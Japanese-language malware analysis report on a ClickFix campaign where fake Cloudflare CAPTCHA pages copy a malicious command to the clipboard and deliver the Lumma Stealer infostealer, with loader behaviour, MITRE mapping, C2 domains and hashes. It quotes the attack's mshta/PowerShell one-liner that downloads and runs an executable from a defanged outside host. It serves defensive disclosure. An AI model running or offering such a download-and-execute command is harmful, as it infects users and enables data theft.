導入:
私たちは最近、2022年に初めて発見された、マルウェア・アズ・ア・サービス(MaaS)モデルで動作するインフォスティーラーであるLumma Stealerを配信するために偽のCAPTCHAページを使用する新しいマルウェアキャンペーンを特定しました。2024年半ばのキャンペーンを含む以前のキャンペーンでは、攻撃者はフィッシングや偽のreCAPTCHAページを含む欺瞞的な戦術であるClickFixを使用して、標的のGoogle検証ページに偽のreCAPTCHAページを送信しました。
今回の最新キャンペーンでは、攻撃者は引き続きClickFixを悪用し、フィッシング詐欺や偽のreCAPTCHAページを利用して、被害者を誘導し、クリップボードにコピーされた悪意のあるコマンドを実行させています。しかし、現在ではCloudflareの認証ページを偽装することに焦点が移っています。本レポートでは、ClickFix感染チェーンの各段階、CloudflareのreCAPTCHAを装ったClickFixページ、そしてMSHTAとPowerShellを悪用して.NETローダーを配信する方法を解説します。
感染チェーン:
感染チェーンは、被害者を騙して悪意のあるコマンドを実行させるために設計された偽のCAPTCHAページから始まります。ウェブページには「私はロボットではありません - Cloudflare認証」といった欺瞞的なメッセージが表示され、Windowsの「ファイル名を指定して実行」ダイアログで指定されたコマンドをコピーして実行するようユーザーに促します。コマンドが実行されると、mshta.exeが起動し、埋め込まれたVBScriptが実行されます。VBScriptはWScript.Shellオブジェクトを作成し、以下のコマンドを実行します。 PowerShellの コマンドを実行します。PowerShellはInvoke-WebRequestを使用して、リモートサーバーから悪意のあるペイロード(g.exe)をダウンロードし、ダウンロードフォルダに保存します。その後、Start-Processを使用してv.exeが実行され、攻撃の次の段階が開始されます。v.exeファイルはローダーとして機能し、Lumma Stealerを復号してメモリに挿入します。
埋め込まれた JS スクリプトの分析:
このスクリプトは、ユーザーを騙して悪意のあるPowerShellコマンドをコピー・実行させることで、ソーシャルエンジニアリング攻撃を実行するように設計されています。この攻撃は、Cloudflareの人間による検証プロセスを装い、正当なものであるように見せかけながら、密かに悪意のある活動を実行します。
テキスト領域要素内の悪意のあるペイロード:
悪意のあるJSスクリプトには、悪意のあるPowerShellコマンドとMSHTAコマンドが埋め込まれた4つのテキストエリア要素が含まれています。最初のペイロードは、hxxps[:]//deskbot.netから悪意のあるファイル(kyc.mp3)をダウンロードして実行するように設計されたPowerShellコマンドを実行します。この手法は、JavaScriptファイル内にコメントアウトされているLumma Stealerの配信に使用されました(図XNUMX参照)。
2 番目のテキスト エリア要素は、mshta.exe を使用して、PowerShell コマンドを起動する VBScript を実行します。
mshta vbscript:Execute(“CreateObject(“”WScript.Shell””).Run(“”powershell -c iwr 'hxxps[:]//kvndbb3[.]com/g[.]exe' -o $HOME\Downloads\v.exe; Start-Process $HOME\Downloads\v.exe””,0)(window.close) ' 私はロボットではありません – Cloudflare 検証ID: 5mUiAHM”)
Invoke-WebRequest (iwr) を使って「g.exe” from kvndbb3[.]com そしてそれを 「v.exe」 ダウンロードフォルダに保存され、Start-Processを使用して実行されます。この方法は、mshta.exeやWScript.Shellなどのセキュリティ対策を迂回するマルウェア攻撃の回避手法として利用されています。
偽の人間による検証戦術:
このスクリプトの最も欺瞞的な側面の一つは、偽の人間による認証メカニズムを使用していることです。Cloudflareの認証プロセスを模倣し、ユーザーに追加の手順が必要だと思わせます。ユーザーが認証ボタンをクリックすると、スクリプトは隠された悪意のあるコマンドを自動的にクリップボードにコピーします。被害者は騙されてこのコマンドをターミナルに貼り付け、実行してしまい、マルウェアのダウンロードと実行を許してしまいます。
攻撃をより効果的にするために、スクリプトには複数の言語(英語、スペイン語、中国語、アラビア語、ヒンディー語など)への翻訳が含まれています。これは、攻撃者が世界中のユーザーをターゲットにしていることを意味し、感染が成功する可能性を高めています。
クリップボードハイジャックのメカニズム:
この脚本は クリップボードにコピー() この機能により、ユーザーが確認ボタンをクリックすると、隠しテキストエリア内の悪意のあるPowerShellコマンドが選択され、クリップボードにコピーされます。これは、ユーザーが知らないうちに悪意のあるコードを実行させる、巧妙な手法です。図3と図5をご覧ください。
コピーが完了すると、攻撃者はユーザーにPowerShellターミナルにコマンドを貼り付けて実行するよう指示します。実行されると、マルウェアがダウンロードされ、インストールされ、被害者のマシン上で永続化を図るために使用される可能性があります。
dotnet ローダーの分析:
ローダーは、研究者の妨害と検出回避のために、様々な分析回避技術を用いています。私たちの分析により、ローダーは実行時間を監視し、デバッグ環境やサンドボックス環境を検知していることが明らかになりました。このチェックは、図8に示すように、潜在的な分析試行を特定するのに役立ちます。
ローダーの解析中に、図9に示すキーを使用してXNUMX番目のペイロードを復号することがわかりました。復号されたコードは、次のキーを使用してプロセスメモリに挿入されます。 API 例えばVirtualProtectに続いてWriteProcessMemoryとCreateThreadを呼び出し、注入されたペイロードを実行します。この手法は検出を回避するためによく使用され、悪意のあるコードが図10に示すメモリ内で実行されるようにします。
ペイロード(Lumma Stealer)の分析:
ペイロード サンプルは、暗号化されたデータと文字列を含む 32 ビットのサンプルです。
図 12 に示すように、マルウェアの実行に進む前に最終チェックとして、「マルウェアを実行しますか?」というメッセージを含むダイアログ ボックスが表示されます。
API 解決機能:
下の図 13 に示す API ハッシュ技術を使用して API を解決する機能があります。
データ漏洩
その マルウェア BitBlt や CreatecompatibleBitmap などの Windows GDI API を活用して、画面全体をキャプチャし、キャプチャしたコンテンツをビットマップ イメージとして保存します。
また、GetClipboardData APIを使用してクリップボードから機密データを窃取しようとします。データが抽出されると、コマンドアンドコントロール(C2C)接続を確立し、窃取した情報を外部に持ち出します。
C2C接続:
Stealer は、User-Agent 文字列に Mozilla/5.0 を使用し、C2C サーバーとの通信時に正規の Web トラフィックに紛れ込みます。この戦術により、Stealer はネットワークトラフィックの異常を監視するセキュリティソリューションによる検出を回避します。
このマルウェアは、更新を容易にし、コマンドを受信し、盗んだデータを外部に持ち出すために、コマンドアンドコントロール サーバーとして 7 つのハードコードされたドメインに依存しています。
まとめ:
ClickFixキャンペーンは、脅威アクターがソーシャルエンジニアリングの手法を用いてセキュリティ対策を回避し、ユーザーを欺き続けていることを如実に示しています。このキャンペーンでは、偽のCloudflare CAPTCHAページ、クリップボードハイジャック、MSHTAやPowerShellなどのWindowsユーティリティの悪用などを活用し、攻撃者はLumma Stealerを効率的に配信・実行しています。この攻撃で使用されている.NETローダーには、検出を回避するための分析回避技術が組み込まれています。キャンペーンで複数の言語が使用されていることから、グローバルな標的型攻撃であることが示唆され、この脅威は広範囲に及んでいます。
MITRE ATT&CKテクニック:
| 名 | テクニックID | 名 |
| 偽のキャプチャ認証 | T1566 | フィッシング詐欺 |
| PowerShell の実行 | T1204
T1059.001 |
ユーザーの実行 コマンドおよびスクリプト インタープリター: PowerShell |
| ムシュタ処刑
|
T1218.005
T1027.009 |
システムバイナリプロキシ実行: Mshta 難読化されたファイルまたは情報: 埋め込まれたペイロード |
| スクリーンキャプチャ | T1113 | スクリーンキャプチャ |
| powershell.exeを使用して暗号化されたペイロードを実行した
|
T1059.001
T1027.013 |
コマンドおよびスクリプト インタープリター: PowerShell 難読化されたファイルまたは情報: 暗号化/エンコードされたファイル |
| 入力キャプチャ | T1056 | キーロギング |
| 防衛回避 | T1055.012 | プロセス射出:プロセスホローイング
|
| コンテンツインジェクション | T1659 | システムに悪意のあるコードを挿入する |
| コマンドおよび制御 | T1071.001 | アプリケーション層プロトコル:Webプロトコル
|
保護:
Trojan.Ghanarava.1739530256ee4fbc
Trojan.Ghanarava.1739337049382d41
Trojan.LummaStealerCiR
IOC:
| MD5 | ファイル名 |
| 9A926390B4E4EF1EEC4E9E6C80382D41 | v.exe |
| 049F8BF92786B0AFF493BC8533EE4FBC | Lummaペイロード |
| C2C | |
| 無視される | |
| ブリーダートレンド | |
| garulouscuto.com | |
| torpdidebar.com | |
| hopeeframed.com | |
| actiothreaz.com | |
| importenptoc.com | |
| rebeldettern.com | |
| torpdidebar.com | |
| voicesharped.com
|
|
著者:
ソウメン・ビルマ
ヴァイブハブ・ビラデ
